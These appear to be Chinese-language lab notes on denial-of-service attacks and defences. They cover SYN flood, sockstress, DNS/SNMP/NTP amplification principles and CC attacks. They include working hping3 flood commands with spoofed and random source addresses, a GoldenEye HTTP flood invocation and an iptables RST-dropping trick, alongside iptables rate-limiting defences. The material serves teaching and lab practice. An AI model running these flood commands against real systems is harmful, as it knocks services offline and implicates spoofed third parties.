一、YAN攻击:
不停的发送SYN请求连接,服务器响应SYN-ACK的确认包,攻击者没有返回确认包,而是继续发送请求。(只有2次握手)
二、sockstress攻击实试并写出攻击原理
原理:
针对TCP服务的拒绝服务攻击,消耗被攻击目标系统资源 -与攻击目标建立大量socket链接,完成三次握手,最后的ACK包window大小为0 (客户端不接收数据) -攻击者资源消耗小(CPU、内存、带宽)
-异步攻击,单机可拒绝服务高配资源服务器
-Window窗-实现的TCP流控
sockstress攻击后
注意,要关闭RST,防火墙规则 iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.2.107 -j DROP
mkdir sockstress 新建文件夹
iptables -L 查看绑 RST
防范措施:
限制单位时间内每IP建的TCP连接数
■封杀每30秒与80端口建立连接超过10个的IP地址
■iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
■ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10
-j DROP
■以上规则对DDoS攻击无效
三、dns、snmp、ntp 放大攻击原理
1、DNS放大攻击原理:
-伪造源地址为被攻击目标地址,向递归域名查询服务器发起查询
-DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDoS
2、SNMP放大攻击原理:
-请求流量小,查询结果返回流量大 -结合伪造源地址实现攻击
3、NTP放大攻击原理:
-NTP服务提monlist (MON_GETLIST)查询功能
监控NTP服务器的状况
-客户端查询时,NTP服务器返回最后同步时间的600个客户端IP
每6个IP—个数据包,最多100个数据包(放大约100倍)
四、应用层快速与慢速攻击测试实验
慢速攻击实验
CC攻击原理:其实就是刷数据库,数据库在几秒中之内无法处理大量的动态连接,一旦处理不及时就会导致服务器崩溃
快速攻击
五、hping3综合攻击ip伪造ip实验
Hping3
-几乎可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试
Syn Flood 攻击
-hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
-hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
-hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP Flood)
ICMP Flood 攻击
-hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
UDP Flood 攻击
-hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
--rand-source 用公网随机地址进行攻击
-a 1.1.1.1 伪造成1.1.1.1进行攻击
hping3 -n -S -d 100 -p 8080 --flood 192.168.2.107 -a 1.1.1.1
hping3 -c 1000 -d 120 -S -w 64 -p 8080 --flood --rand-source 192.168.2.107
六、GoldenEye 7层web测试验验
GoldenEye
-http/https拒绝服务攻击工具
-安全研究为目的Python脚本
-随机攻击向量,keep-alive,避免缓存命中
goldeneye.py http://1.1.1.1 -w 50 –mrandom //-w 50代表50个人 ,-s 500代表每个人500个,50*500打25000个链接。
七、ddos防火墙安装配置并实现防预
攻击后被防御
注意:如果没有防御,检查一下端口号,再防火墙里添加
